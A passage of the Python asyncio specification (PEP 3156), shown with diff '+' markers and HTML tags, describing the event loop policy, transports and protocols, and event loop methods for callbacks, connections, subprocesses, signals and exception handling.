As of October 20th 2013, the asyncio package has been checked into +the Python 3.4 repository and released with Python 3.4-alpha-4, with +“provisional” API status. This is an expression of confidence and +intended to increase early feedback on the API, and not intended to +force acceptance of the PEP. The expectation is that the package will +keep provisional status in Python 3.4 and progress to final status in +Python 3.5. Development continues to occur primarily in the Tulip +repo, with changes occasionally merged into the CPython repo.

+
+
+

Dependencies

+

Python 3.3 is required for many of the proposed features. The +reference implementation (Tulip) requires no new language or standard +library features beyond Python 3.3, no third-party modules or +packages, and no C code, except for the (optional) IOCP support on +Windows.

+
+
+

Module Namespace

+

The specification here lives in a new top-level package, asyncio. +Different components live in separate submodules of the package. The +package will import common APIs from their respective submodules and +make them available as package attributes (similar to the way the +email package works). For such common APIs, the name of the submodule +that actually defines them is not part of the specification. Less +common APIs may have to explicitly be imported from their respective +submodule, and in this case the submodule name is part of the +specification.

+

Classes and functions defined without a submodule name are assumed to +live in the namespace of the top-level package. (But do not confuse +these with methods of various classes, which for brevity are also used +without a namespace prefix in certain contexts.)

+
+
+

Interoperability

+

The event loop is the place where most interoperability occurs. It +should be easy for (Python 3.3 ports of) frameworks like Twisted, +Tornado, or even gevents to either adapt the default event loop +implementation to their needs using a lightweight adapter or proxy, or +to replace the default event loop implementation with an adaptation of +their own event loop implementation. (Some frameworks, like Twisted, +have multiple event loop implementations. This should not be a +problem since these all have the same interface.)

+

In most cases it should be possible for two different third-party +frameworks to interoperate, either by sharing the default event loop +implementation (each using its own adapter), or by sharing the event +loop implementation of either framework. In the latter case two +levels of adaptation would occur (from framework A’s event loop to the +standard event loop interface, and from there to framework B’s event +loop). Which event loop implementation is used should be under +control of the main program (though a default policy for event loop +selection is provided).

+

For this interoperability to be effective, the preferred direction of +adaptation in third party frameworks is to keep the default event loop +and adapt it to the framework’s API. Ideally all third party +frameworks would give up their own event loop implementation in favor +of the standard implementation. But not all frameworks may be +satisfied with the functionality provided by the standard +implementation.

+

In order to support both directions of adaptation, two separate APIs +are specified:

+
    +
  • An interface for managing the current event loop
  • +
  • The interface of a conforming event loop
  • +
+

An event loop implementation may provide additional methods and +guarantees, as long as these are called out in the documentation as +non-standard. An event loop implementation may also leave certain +methods unimplemented if they cannot be implemented in the given +environment; however, such deviations from the standard API should be +considered only as a last resort, and only if the platform or +environment forces the issue. (An example would be a platform where +there is a system event loop that cannot be started or stopped; see +“Embedded Event Loops” below.)

+

The event loop API does not depend on await/yield from. Rather, it uses +a combination of callbacks, additional interfaces (transports and +protocols), and Futures. The latter are similar to those defined in +PEP 3148, but have a different implementation and are not tied to +threads. In particular, the result() method raises an exception +instead of blocking when a result is not yet ready; the user is +expected to use callbacks (or await/yield from) to wait for the result.

+

All event loop methods specified as returning a coroutine are allowed +to return either a Future or a coroutine, at the implementation’s +choice (the standard implementation always returns coroutines). All +event loop methods documented as accepting coroutine arguments must +accept both Futures and coroutines for such arguments. (A convenience +function, ensure_future(), exists to convert an argument that is either a +coroutine or a Future into a Future.)

+

For users (like myself) who don’t like using callbacks, a scheduler is +provided for writing asynchronous I/O code as coroutines using the PEP +380 yield from or PEP 492 await expressions. +The scheduler is not pluggable; +pluggability occurs at the event loop level, and the standard +scheduler implementation should work with any conforming event loop +implementation. (In fact this is an important litmus test for +conforming implementations.)

+

For interoperability between code written using coroutines and other +async frameworks, the scheduler defines a Task class that behaves like a +Future. A framework that interoperates at the event loop level can +wait for a Future to complete by adding a callback to the Future. +Likewise, the scheduler offers an operation to suspend a coroutine +until a callback is called.

+

If such a framework cannot use the Future and Task classes as-is, it +may reimplement the loop.create_future() and +loop.create_task() methods. These should return objects +implementing (a superset of) the Future/Task interfaces.

+

A less ambitious framework may just call the +loop.set_task_factory() to replace the Task class without +implementing its own event loop.

+

The event loop API provides limited interoperability with threads: +there is an API to submit a function to an executor (see PEP 3148) +which returns a Future that is compatible with the event loop, and +there is a method to schedule a callback with an event loop from +another thread in a thread-safe manner.

+
+
+

Transports and Protocols

+

For those not familiar with Twisted, a quick explanation of the +relationship between transports and protocols is in order. At the +highest level, the transport is concerned with how bytes are +transmitted, while the protocol determines which bytes to transmit +(and to some extent when).

+

A different way of saying the same thing: a transport is an +abstraction for a socket (or similar I/O endpoint) while a protocol is +an abstraction for an application, from the transport’s point of view.

+

Yet another view is simply that the transport and protocol interfaces +together define an abstract interface for using network I/O and +interprocess I/O.

+

There is almost always a 1:1 relationship between transport and +protocol objects: the protocol calls transport methods to send data, +while the transport calls protocol methods to pass it data that has +been received. Neither transport nor protocol methods “block” – they +set events into motion and then return.

+

The most common type of transport is a bidirectional stream transport. +It represents a pair of buffered streams (one in each direction) that +each transmit a sequence of bytes. The most common example of a +bidirectional stream transport is probably a TCP connection. Another +common example is an SSL/TLS connection. But there are some other things +that can be viewed this way, for example an SSH session or a pair of +UNIX pipes. Typically there aren’t many different transport +implementations, and most of them come with the event loop +implementation. However, there is no requirement that all transports +must be created by calling an event loop method: a third party module +may well implement a new transport and provide a constructor or +factory function for it that simply takes an event loop as an argument +or calls get_event_loop().

+

Note that transports don’t need to use sockets, not even if they use +TCP – sockets are a platform-specific implementation detail.

+

A bidirectional stream transport has two “ends”: one end talks to +the network (or another process, or whatever low-level interface it +wraps), and the other end talks to the protocol. The former uses +whatever API is necessary to implement the transport; but the +interface between transport and protocol is standardized by this PEP.

+

A protocol can represent some kind of “application-level” protocol +such as HTTP or SMTP; it can also implement an abstraction shared by +multiple protocols, or a whole application. A protocol’s primary +interface is with the transport. While some popular protocols (and +other abstractions) may have standard implementations, often +applications implement custom protocols. It also makes sense to have +libraries of useful third party protocol implementations that can be +downloaded and installed from PyPI.

+

There general notion of transport and protocol includes other +interfaces, where the transport wraps some other communication +abstraction. Examples include interfaces for sending and receiving +datagrams (e.g. UDP), or a subprocess manager. The separation of +concerns is the same as for bidirectional stream transports and +protocols, but the specific interface between transport and protocol +is different in each case.

+

Details of the interfaces defined by the various standard types of +transports and protocols are given later.

+
+
+
+

Event Loop Interface Specification

+
+

Event Loop Policy: Getting and Setting the Current Event Loop

+

Event loop management is controlled by an event loop policy, which is +a global (per-process) object. There is a default policy, and an API +to change the policy. A policy defines the notion of context; a +policy manages a separate event loop per context. The default +policy’s notion of context is defined as the current thread.

+

Certain platforms or programming frameworks may change the default +policy to something more suitable to the expectations of the users of +that platform or framework. Such platforms or frameworks must +document their policy and at what point during their initialization +sequence the policy is set, in order to avoid undefined behavior when +multiple active frameworks want to override the default policy. +(See also “Embedded Event Loops” below.)

+

To get the event loop for current context, use get_event_loop(). +This returns an event loop object implementing the interface specified +below, or raises an exception in case no event loop has been set for +the current context and the current policy does not specify to create +one. It should never return None.

+

To set the event loop for the current context, use +set_event_loop(event_loop), where event_loop is an event loop +object, i.e. an instance of AbstractEventLoop, or None. +It is okay to set the current event loop to None, in +which case subsequent calls to get_event_loop() will raise an +exception. This is useful for testing code that should not depend on +the existence of a default event loop.

+

It is expected that get_event_loop() returns a different event +loop object depending on the context (in fact, this is the definition +of context). It may create a new event loop object if none is set and +creation is allowed by the policy. The default policy will create a +new event loop only in the main thread (as defined by threading.py, +which uses a special subclass for the main thread), and only if +get_event_loop() is called before set_event_loop() is ever +called. (To reset this state, reset the policy.) In other threads an +event loop must be explicitly set. Other policies may behave +differently. Event loop by the default policy creation is lazy; +i.e. the first call to get_event_loop() creates an event loop +instance if necessary and specified by the current policy.

+

For the benefit of unit tests and other special cases there’s a third +policy function: new_event_loop(), which creates and returns a new +event loop object according to the policy’s default rules. To make +this the current event loop, you must call set_event_loop() with +it.

+

To change the event loop policy, call +set_event_loop_policy(policy), where policy is an event loop +policy object or None. If not None, the policy object must be +an instance of AbstractEventLoopPolicy that defines methods +get_event_loop(), set_event_loop(loop) and +new_event_loop(), all behaving like the functions described above.

+

Passing a policy value of None restores the default event loop +policy (overriding the alternate default set by the platform or +framework). The default event loop policy is an instance of the class +DefaultEventLoopPolicy. The current event loop policy object can +be retrieved by calling get_event_loop_policy().

+

TBD: describe child watchers and UNIX quirks for subprocess processing.

+
+

Passing an Event Loop Around Explicitly

+

It is possible to write code that uses an event loop without relying +on a global or per-thread default event loop. For this purpose, all +APIs that need access to the current event loop (and aren’t methods on +an event class) take an optional keyword argument named loop. If +this argument is None or unspecified, such APIs will call +get_event_loop() to get the default event loop, but if the +loop keyword argument is set to an event loop object, they will +use that event loop, and pass it along to any other such APIs they +call. For example, Future(loop=my_loop) will create a Future tied +to the event loop my_loop. When the default current event is +None, the loop keyword argument is effectively mandatory.

+

Note that an explicitly passed event loop must still belong to the +current thread; the loop keyword argument does not magically +change the constraints on how an event loop can be used.

+
+
+
+

Specifying Times

+

As usual in Python, all timeouts, intervals and delays are measured in +seconds, and may be ints or floats. However, absolute times are not +specified as POSIX timestamps. The accuracy, precision and epoch of +the clock are up to the implementation.

+

The default implementation uses time.monotonic(). Books could be +written about the implications of this choice. Better read the docs +for the standard library time module.

+
+
+

Embedded Event Loops

+

On some platforms an event loop is provided by the system. Such a +loop may already be running when the user code starts, and there may +be no way to stop or close it without exiting from the program. In +this case, the methods for starting, stopping and closing the event +loop may not be implementable, and is_running() may always return +True.

+
+
+

Event Loop Classes

+

There is no actual class named EventLoop. There is an +AbstractEventLoop class which defines all the methods without +implementations, and serves primarily as documentation. The following +concrete classes are defined:

+
    +
  • SelectorEventLoop is a concrete implementation of the full API +based on the selectors module (new in Python 3.4). The +constructor takes one optional argument, a selectors.Selector +object. By default an instance of selectors.DefaultSelector is +created and used.
  • +
  • ProactorEventLoop is a concrete implementation of the API except +for the I/O event handling and signal handling methods. It is only +defined on Windows (or on other platforms which support a similar +API for “overlapped I/O”). The constructor takes one optional +argument, a Proactor object. By default an instance of +IocpProactor is created and used. (The IocpProactor class +is not specified by this PEP; it is just an implementation +detail of the ProactorEventLoop class.)
  • +
+
+
+

Event Loop Methods Overview

+

The methods of a conforming event loop are grouped into several +categories. The first set of categories must be supported by all +conforming event loop implementations, with the exception that +embedded event loops may not implement the methods for starting, +stopping and closing. (However, a partially-conforming event loop is +still better than nothing. :-)

+
    +
  • Starting, stopping and closing: run_forever(), +run_until_complete(), stop(), is_running(), close(), +is_closed().
  • +
  • Basic and timed callbacks: call_soon(), call_later(), +call_at(), time().
  • +
  • Thread interaction: call_soon_threadsafe(), +run_in_executor(), set_default_executor().
  • +
  • Internet name lookups: getaddrinfo(), getnameinfo().
  • +
  • Internet connections: create_connection(), create_server(), +create_datagram_endpoint().
  • +
  • Wrapped socket methods: sock_recv(), sock_sendall(), +sock_connect(), sock_accept().
  • +
  • Tasks and futures support: create_future(), create_task(), +set_task_factory(), get_task_factory().
  • +
  • Error handling: get_exception_handler(), set_exception_handler(), +default_exception_handler(), call_exception_handler().
  • +
  • Debug mode: get_debug(), set_debug().
  • +
+

The second set of categories may be supported by conforming event +loop implementations. If not supported, they will raise +NotImplementedError. (In the default implementation, +SelectorEventLoop on UNIX systems supports all of these; +SelectorEventLoop on Windows supports the I/O event handling +category; ProactorEventLoop on Windows supports the pipes and +subprocess category.)

+
    +
  • I/O callbacks: add_reader(), remove_reader(), +add_writer(), remove_writer().
  • +
  • Pipes and subprocesses: connect_read_pipe(), +connect_write_pipe(), subprocess_shell(), +subprocess_exec().
  • +
  • Signal callbacks: add_signal_handler(), +remove_signal_handler().
  • +
+
+
+

Event Loop Methods

+
+

Starting, Stopping and Closing

+

An (unclosed) event loop can be in one of two states: running or +stopped. These methods deal with starting and stopping an event loop:

+
    +
  • run_forever(). Runs the event loop until stop() is called. +This cannot be called when the event loop is already running. (This +has a long name in part to avoid confusion with earlier versions of +this PEP, where run() had different behavior, in part because +there are already too many APIs that have a method named run(), +and in part because there shouldn’t be many places where this is +called anyway.)
  • +
  • run_until_complete(future). Runs the event loop until the +Future is done. If the Future is done, its result is returned, or +its exception is raised. This cannot be called when the event loop +is already running. +The method creates a new Task object if the +parameter is a coroutine.
  • +
  • stop(). Stops the event loop as soon as it is convenient. It +is fine to restart the loop with run_forever() or +run_until_complete() subsequently; no scheduled callbacks will +be lost if this is done. Note: stop() returns normally and the +current callback is allowed to continue. How soon after this point +the event loop stops is up to the implementation, but the intention +is to stop short of polling for I/O, and not to run any callbacks +scheduled in the future; the major freedom an implementation has is +how much of the “ready queue” (callbacks already scheduled with +call_soon()) it processes before stopping.
  • +
  • is_running(). Returns True if the event loop is currently +running, False if it is stopped.
  • +
  • close(). Closes the event loop, releasing any resources it may +hold, such as the file descriptor used by epoll() or +kqueue(), and the default executor. This should not be called +while the event loop is running. After it has been called the event +loop should not be used again. It may be called multiple times; +subsequent calls are no-ops.
  • +
  • is_closed(). Returns True if the event loop is closed, +False otherwise. (Primarily intended for error reporting; +please don’t implement functionality based on this method.)
  • +
+
+
+

Basic Callbacks

+

Callbacks associated with the same event loop are strictly serialized: +one callback must finish before the next one will be called. This is +an important guarantee: when two or more callbacks use or modify +shared state, each callback is guaranteed that while it is running, the +shared state isn’t changed by another callback.

+
    +
  • call_soon(callback, *args). This schedules a callback to be +called as soon as possible. Returns a Handle (see below) +representing the callback, whose cancel() method can be used to +cancel the callback. It guarantees that callbacks are called in the +order in which they were scheduled.
  • +
  • call_later(delay, callback, *args). Arrange for +callback(*args) to be called approximately delay seconds in +the future, once, unless cancelled. Returns a Handle representing +the callback, whose cancel() method can be used to cancel the +callback. Callbacks scheduled in the past or at exactly the same +time will be called in an undefined order.
  • +
  • call_at(when, callback, *args). This is like call_later(), +but the time is expressed as an absolute time. Returns a similar +Handle. There is a simple equivalency: loop.call_later(delay, +callback, *args) is the same as loop.call_at(loop.time() + +delay, callback, *args).
  • +
  • time(). Returns the current time according to the event loop’s +clock. This may be time.time() or time.monotonic() or some +other system-specific clock, but it must return a float expressing +the time in units of approximately one second since some epoch. +(No clock is perfect – see PEP 418.)
  • +
+

Note: A previous version of this PEP defined a method named +call_repeatedly(), which promised to call a callback at regular +intervals. This has been withdrawn because the design of such a +function is overspecified. On the one hand, a simple timer loop can +easily be emulated using a callback that reschedules itself using +call_later(); it is also easy to write coroutine containing a loop +and a sleep() call (a toplevel function in the module, see below). +On the other hand, due to the complexities of accurate timekeeping +there are many traps and pitfalls here for the unaware (see PEP 418), +and different use cases require different behavior in edge cases. It +is impossible to offer an API for this purpose that is bullet-proof in +all cases, so it is deemed better to let application designers decide +for themselves what kind of timer loop to implement.

+
+
+

Thread interaction

+
    +
  • call_soon_threadsafe(callback, *args). Like +call_soon(callback, *args), but when called from another thread +while the event loop is blocked waiting for I/O, unblocks the event +loop. Returns a Handle. This is the only method that is safe +to call from another thread. (To schedule a callback for a later +time in a threadsafe manner, you can use +loop.call_soon_threadsafe(loop.call_later, when, callback, +*args).) Note: this is not safe to call from a signal handler +(since it may use locks). In fact, no API is signal-safe; if you +want to handle signals, use add_signal_handler() described +below.
  • +
  • run_in_executor(executor, callback, *args). Arrange to call +callback(*args) in an executor (see PEP 3148). Returns an +asyncio.Future instance whose result on success is the return +value of that call. This is equivalent to +wrap_future(executor.submit(callback, *args)). If executor +is None, the default executor set by set_default_executor() +is used. If no default executor has been set yet, a +ThreadPoolExecutor with a default number of threads is created +and set as the default executor. (The default implementation uses +5 threads in this case.)
  • +
  • set_default_executor(executor). Set the default executor used +by run_in_executor(). The argument must be a PEP 3148 +Executor instance or None, in order to reset the default +executor.
  • +
+

See also the wrap_future() function described in the section about +Futures.

+
+
+

Internet name lookups

+

These methods are useful if you want to connect or bind a socket to an +address without the risk of blocking for the name lookup. They are +usually called implicitly by create_connection(), +create_server() or create_datagram_endpoint().

+
    +
  • getaddrinfo(host, port, family=0, type=0, proto=0, flags=0). +Similar to the socket.getaddrinfo() function but returns a +Future. The Future’s result on success will be a list of the same +format as returned by socket.getaddrinfo(), i.e. a list of +(address_family, socket_type, socket_protocol, canonical_name, +address) where address is a 2-tuple (ipv4_address, port) +for IPv4 addresses and a 4-tuple (ipv6_address, port, flow_info, +scope_id) for IPv6 addresses. If the family argument is zero +or unspecified, the list returned may contain a mixture of IPv4 and +IPv6 addresses; otherwise the addresses returned are constrained by +the family value (similar for proto and flags). The +default implementation calls socket.getaddrinfo() using +run_in_executor(), but other implementations may choose to +implement their own DNS lookup. The optional arguments must be +specified as keyword arguments.

    Note: implementations are allowed to implement a subset of the full +socket.getaddrinfo() interface; e.g. they may not support symbolic +port names, or they may ignore or incompletely implement the +type, proto and flags arguments. However, if type +and proto are ignored, the argument values passed in should be +copied unchanged into the return tuples’ socket_type and +socket_protocol elements. (You can’t ignore family, since +IPv4 and IPv6 addresses must be looked up differently. The only +permissible values for family are socket.AF_UNSPEC (0), +socket.AF_INET and socket.AF_INET6, and the latter only if +it is defined by the platform.)

    +
  • +
  • getnameinfo(sockaddr, flags=0). Similar to +socket.getnameinfo() but returns a Future. The Future’s result +on success will be a tuple (host, port). Same implementation +remarks as for getaddrinfo().
  • +
+
+
+

Internet connections

+

These are the high-level interfaces for managing internet connections. +Their use is recommended over the corresponding lower-level interfaces +because they abstract away the differences between selector-based +and proactor-based event loops.

+

Note that the client and server side of stream connections use the +same transport and protocol interface. However, datagram endpoints +use a different transport and protocol interface.

+
    +
  • create_connection(protocol_factory, host, port, <options>). +Creates a stream connection to a given internet host and port. This +is a task that is typically called from the client side of the +connection. It creates an implementation-dependent bidirectional +stream Transport to represent the connection, then calls +protocol_factory() to instantiate (or retrieve) the user’s +Protocol implementation, and finally ties the two together. (See +below for the definitions of Transport and Protocol.) The user’s +Protocol implementation is created or retrieved by calling +protocol_factory() without arguments(*). The coroutine’s result +on success is the (transport, protocol) pair; if a failure +prevents the creation of a successful connection, an appropriate +exception will be raised. Note that when the coroutine completes, +the protocol’s connection_made() method has not yet been called; +that will happen when the connection handshake is complete.

    (*) There is no requirement that protocol_factory is a class. +If your protocol class needs to have specific arguments passed to +its constructor, you can use lambda. +You can also pass a trivial lambda that returns a previously +constructed Protocol instance.

    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • ssl: Pass True to create an SSL/TLS transport (by default +a plain TCP transport is created). Or pass an ssl.SSLContext +object to override the default SSL context object to be used. If +a default context is created it is up to the implementation to +configure reasonable defaults. The reference implementation +currently uses PROTOCOL_SSLv23 and sets the OP_NO_SSLv2 +option, calls set_default_verify_paths() and sets verify_mode +to CERT_REQUIRED. In addition, whenever the context (default +or otherwise) specifies a verify_mode of CERT_REQUIRED or +CERT_OPTIONAL, if a hostname is given, immediately after a +successful handshake ssl.match_hostname(peercert, hostname) is +called, and if this raises an exception the connection is closed. +(To avoid this behavior, pass in an SSL context that has +verify_mode set to CERT_NONE. But this means you are not +secure, and vulnerable to for example man-in-the-middle attacks.)
    • +
    • family, proto, flags: Address family, protocol and +flags to be passed through to getaddrinfo(). These all +default to 0, which means “not specified”. (The socket type +is always SOCK_STREAM.) If any of these values are not +specified, the getaddrinfo() method will choose appropriate +values. Note: proto has nothing to do with the high-level +Protocol concept or the protocol_factory argument.
    • +
    • sock: An optional socket to be used instead of using the +host, port, family, proto and flags +arguments. If this is given, host and port must be +explicitly set to None.
    • +
    • local_addr: If given, a (host, port) tuple used to bind +the socket to locally. This is rarely needed but on multi-homed +servers you occasionally need to force a connection to come from a +specific address. This is how you would do that. The host and +port are looked up using getaddrinfo().
    • +
    • server_hostname: This is only relevant when using SSL/TLS; it +should not be used when ssl is not set. When ssl is set, +this sets or overrides the hostname that will be verified. By +default the value of the host argument is used. If host +is empty, there is no default and you must pass a value for +server_hostname. To disable hostname verification (which is a +serious security risk) you must pass an empty string here and pass +an ssl.SSLContext object whose verify_mode is set to +ssl.CERT_NONE as the ssl argument.
    • +
    +
  • +
  • create_server(protocol_factory, host, port, <options>). +Enters a serving loop that accepts connections. +This is a coroutine that completes once the serving loop is set up +to serve. The return value is a Server object which can be used +to stop the serving loop in a controlled fashion (see below). +Multiple sockets may be bound if the specified address allows +both IPv4 and IPv6 connections.

    Each time a connection is accepted, +protocol_factory is called without arguments(**) to create a +Protocol, a bidirectional stream Transport is created to represent +the network side of the connection, and the two are tied together by +calling protocol.connection_made(transport).

    +

    (**) See previous footnote for create_connection(). However, since +protocol_factory() is called once for each new incoming +connection, it should return a new Protocol object each time it is +called.

    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • ssl: Pass an ssl.SSLContext object (or an object with the +same interface) to override the default SSL context object to be +used. (Unlike for create_connection(), passing True does +not make sense here – the SSLContext object is needed to +specify the certificate and key.)
    • +
    • backlog: Backlog value to be passed to the listen() call. +The default is implementation-dependent; in the default +implementation the default value is 100.
    • +
    • reuse_address: Whether to set the SO_REUSEADDR option on +the socket. The default is True on UNIX, False on +Windows.
    • +
    • family, flags: Address family and flags to be passed +through to getaddrinfo(). The family defaults to +AF_UNSPEC; the flags default to AI_PASSIVE. (The socket +type is always SOCK_STREAM; the socket protocol always set to +0, to let getaddrinfo() choose.)
    • +
    • sock: An optional socket to be used instead of using the +host, port, family and flags arguments. If this +is given, host and port must be explicitly set to None.
    • +
    +
  • +
  • create_datagram_endpoint(protocol_factory, local_addr=None, +remote_addr=None, <options>). Creates an endpoint for sending and +receiving datagrams (typically UDP packets). Because of the nature +of datagram traffic, there are no separate calls to set up client +and server side, since usually a single endpoint acts as both client +and server. This is a coroutine that returns a (transport, +protocol) pair on success, or raises an exception on failure. If +the coroutine returns successfully, the transport will call +callbacks on the protocol whenever a datagram is received or the +socket is closed; it is up to the protocol to call methods on the +protocol to send datagrams. The transport returned is a +DatagramTransport. The protocol returned is a +DatagramProtocol. These are described later.

    Mandatory positional argument:

    +
      +
    • protocol_factory: A class or factory function that will be +called exactly once, without arguments, to construct the protocol +object to be returned. The interface between datagram transport +and protocol is described below.
    • +
    +

    Optional arguments that may be specified positionally or as keyword +arguments:

    +
      +
    • local_addr: An optional tuple indicating the address to which +the socket will be bound. If given this must be a (host, +port) pair. It will be passed to getaddrinfo() to be +resolved and the result will be passed to the bind() method of +the socket created. If getaddrinfo() returns more than one +address, they will be tried in turn. If omitted, no bind() +call will be made.
    • +
    • remote_addr: An optional tuple indicating the address to which +the socket will be “connected”. (Since there is no such thing as +a datagram connection, this just specifies a default value for the +destination address of outgoing datagrams.) If given this must be +a (host, port) pair. It will be passed to getaddrinfo() +to be resolved and the result will be passed to sock_connect() +together with the socket created. If getaddrinfo() returns +more than one address, they will be tried in turn. If omitted, +no sock_connect() call will be made.
    • +
    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • family, proto, flags: Address family, protocol and +flags to be passed through to getaddrinfo(). These all +default to 0, which means “not specified”. (The socket type +is always SOCK_DGRAM.) If any of these values are not +specified, the getaddrinfo() method will choose appropriate +values.
    • +
    +

    Note that if both local_addr and remote_addr are present, +all combinations of local and remote addresses with matching address +family will be tried.

    +
  • +
+
+
+

Wrapped Socket Methods

+

The following methods for doing async I/O on sockets are not for +general use. They are primarily meant for transport implementations +working with IOCP through the ProactorEventLoop class. However, +they are easily implementable for other event loop types, so there is +no reason not to require them. The socket argument has to be a +non-blocking socket.

+
    +
  • sock_recv(sock, n). Receive up to n bytes from socket +sock. Returns a Future whose result on success will be a +bytes object.
  • +
  • sock_sendall(sock, data). Send bytes data to socket +sock. Returns a Future whose result on success will be +None. Note: the name uses sendall instead of send, to +reflect that the semantics and signature of this method echo those +of the standard library socket method sendall() rather than +send().
  • +
  • sock_connect(sock, address). Connect to the given address. +Returns a Future whose result on success will be None.
  • +
  • sock_accept(sock). Accept a connection from a socket. The +socket must be in listening mode and bound to an address. Returns a +Future whose result on success will be a tuple (conn, peer) +where conn is a connected non-blocking socket and peer is +the peer address.
  • +
+
+
+

I/O Callbacks

+

These methods are primarily meant for transport implementations +working with a selector. They are implemented by +SelectorEventLoop but not by ProactorEventLoop. Custom event +loop implementations may or may not implement them.

+

The fd arguments below may be integer file descriptors, or +“file-like” objects with a fileno() method that wrap integer file +descriptors. Not all file-like objects or file descriptors are +acceptable. Sockets (and socket file descriptors) are always +accepted. On Windows no other types are supported. On UNIX, pipes +and possibly tty devices are also supported, but disk files are not. +Exactly which special file types are supported may vary by platform +and per selector implementation. (Experimentally, there is at least +one kind of pseudo-tty on OS X that is supported by select and +poll but not by kqueue: it is used by Emacs shell windows.)

+
    +
  • add_reader(fd, callback, *args). Arrange for +callback(*args) to be called whenever file descriptor fd is +deemed ready for reading. Calling add_reader() again for the +same file descriptor implies a call to remove_reader() for the +same file descriptor.
  • +
  • add_writer(fd, callback, *args). Like add_reader(), +but registers the callback for writing instead of for reading.
  • +
  • remove_reader(fd). Cancels the current read callback for file +descriptor fd, if one is set. If no callback is currently set +for the file descriptor, this is a no-op and returns False. +Otherwise, it removes the callback arrangement and returns True.
  • +
  • remove_writer(fd). This is to add_writer() as +remove_reader() is to add_reader().
  • +
+
+
+

Pipes and Subprocesses

+

These methods are supported by SelectorEventLoop on UNIX and +ProactorEventLoop on Windows.

+

The transports and protocols used with pipes and subprocesses differ +from those used with regular stream connections. These are described +later.

+

Each of the methods below has a protocol_factory argument, similar +to create_connection(); this will be called exactly once, without +arguments, to construct the protocol object to be returned.

+

Each method is a coroutine that returns a (transport, protocol) +pair on success, or raises an exception on failure.

+
    +
  • connect_read_pipe(protocol_factory, pipe): Create a +unidrectional stream connection from a file-like object wrapping the +read end of a UNIX pipe, which must be in non-blocking mode. The +transport returned is a ReadTransport.
  • +
  • connect_write_pipe(protocol_factory, pipe): Create a +unidrectional stream connection from a file-like object wrapping the +write end of a UNIX pipe, which must be in non-blocking mode. The +transport returned is a WriteTransport; it does not have any +read-related methods. The protocol returned is a BaseProtocol.
  • +
  • subprocess_shell(protocol_factory, cmd, <options>): Create a +subprocess from cmd, which is a string using the platform’s +“shell” syntax. This is similar to the standard library +subprocess.Popen() class called with shell=True. The +remaining arguments and return value are described below.
  • +
  • subprocess_exec(protocol_factory, *args, <options>): Create a +subprocess from one or more string arguments, where the first string +specifies the program to execute, and the remaining strings specify +the program’s arguments. (Thus, together the string arguments form +the sys.argv value of the program, assuming it is a Python +script.) This is similar to the standard library +subprocess.Popen() class called with shell=False and the +list of strings passed as the first argument; however, where +Popen() takes a single argument which is list of strings, +subprocess_exec() takes multiple string arguments. The +remaining arguments and return value are described below.
  • +
+

Apart from the way the program to execute is specified, the two +subprocess_*() methods behave the same. The transport returned is +a SubprocessTransport which has a different interface than the +common bidirectional stream transport. The protocol returned is a +SubprocessProtocol which also has a custom interface.

+

The <options> are all specified using optional keyword arguments:

+
    +
  • stdin: Either a file-like object representing the pipe to be +connected to the subprocess’s standard input stream using +connect_write_pipe(), or the constant subprocess.PIPE (the +default). By default a new pipe will be created and connected.
  • +
  • stdout: Either a file-like object representing the pipe to be +connected to the subprocess’s standard output stream using +connect_read_pipe(), or the constant subprocess.PIPE (the +default). By default a new pipe will be created and connected.
  • +
  • stderr: Either a file-like object representing the pipe to be +connected to the subprocess’s standard error stream using +connect_read_pipe(), or one of the constants subprocess.PIPE +(the default) or subprocess.STDOUT. By default a new pipe will +be created and connected. When subprocess.STDOUT is specified, +the subprocess’s standard error stream will be connected to the same +pipe as the standard output stream.
  • +
  • bufsize: The buffer size to be used when creating a pipe; this +is passed to subprocess.Popen(). In the default implementation +this defaults to zero, and on Windows it must be zero; these +defaults deviate from subprocess.Popen().
  • +
  • executable, preexec_fn, close_fds, cwd, env, +startupinfo, creationflags, restore_signals, +start_new_session, pass_fds: These optional arguments are +passed to subprocess.Popen() without interpretation.
  • +
+
+
+

Signal callbacks

+

These methods are only supported on UNIX.

+
    +
  • add_signal_handler(sig, callback, *args). Whenever signal +sig is received, arrange for callback(*args) to be called. +Specifying another callback for the same signal replaces the +previous handler (only one handler can be active per signal). The +sig must be a valid signal number defined in the signal +module. If the signal cannot be handled this raises an exception: +ValueError if it is not a valid signal or if it is an +uncatchable signal (e.g. SIGKILL), RuntimeError if this +particular event loop instance cannot handle signals (since signals +are global per process, only an event loop associated with the main +thread can handle signals).
  • +
  • remove_signal_handler(sig). Removes the handler for signal +sig, if one is set. Raises the same exceptions as +add_signal_handler() (except that it may return False +instead raising RuntimeError for uncatchable signals). Returns +True if a handler was removed successfully, False if no +handler was set.
  • +
+

Note: If these methods are statically known to be unsupported, they +may raise NotImplementedError instead of RuntimeError.

+
+
+
+

Mutual Exclusion of Callbacks

+

An event loop should enforce mutual exclusion of callbacks, i.e. it +should never start a callback while a previously callback is still +running. This should apply across all types of callbacks, regardless +of whether they are scheduled using call_soon(), call_later(), +call_at(), call_soon_threadsafe(), add_reader(), +add_writer(), or add_signal_handler().

+
+
+

Exceptions

+

There are two categories of exceptions in Python: those that derive +from the Exception class and those that derive from +BaseException. Exceptions deriving from Exception will +generally be caught and handled appropriately; for example, they will +be passed through by Futures, and they will be logged and ignored when +they occur in a callback.

+

However, exceptions deriving only from BaseException are typically +not caught, and will usually cause the program to terminate with a +traceback. In some cases they are caught and re-raised. (Examples of +this category include KeyboardInterrupt and SystemExit; it is +usually unwise to treat these the same as most other exceptions.)

+

The event loop passes the latter category into its exception +handler. This is a callback which accepts a context dict as a +parameter:

+
def exception_handler(context):
+    ...
+
+
+

context may have many different keys but several of them are very +widely used:

+
    +
  • 'message': error message.
  • +
  • 'exception': exception instance; None if there is no +exception.
  • +
  • 'source_traceback': a list of strings representing stack at the +point the object involved in the error was created.
  • +
  • 'handle_traceback': a list of strings representing the stack at +the moment the handle involved in the error was created.
  • +
+

The loop has the following methods related to exception handling:

+
    +
  • get_exception_handler() returns the current exception handler +registered for the loop.
  • +
  • set_exception_handler(handler) sets the exception handler.
  • +
  • default_exception_handler(context) the default exception +handler for this loop implementation.
  • +
  • call_exception_handler(context) passes context into the +registered exception handler. This allows handling uncaught +exceptions uniformly by third-party libraries.

    The loop uses default_exception_handler() if the default was not +overridden by explicit set_exception_handler() call.

    +
  • +
+
+
+

Debug Mode

+

By default the loop operates in release mode. Applications may +enable debug mode better error reporting at the cost of some +performance.

+
